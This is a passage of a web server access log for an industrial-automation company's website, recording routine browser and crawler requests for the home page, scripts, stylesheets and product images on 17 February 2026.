(KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:00:11 +0000] - - 301 - GET http www.hanmocnn.co.kr "/robots.txt" [Client 74.7.244.50] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:13:00:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 74.7.244.50] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "http://www.hanmocnn.co.kr/robots.txt" +[17/Feb/2026:13:00:12 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 74.7.243.250] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr" +[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 20913] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 211.234.204.1] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:13:36:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 211.234.204.1] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:17:22:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 141.51.110.126] [Length 10440] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:56:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:56:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:21:56:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20925] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:39:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:51:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10448] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 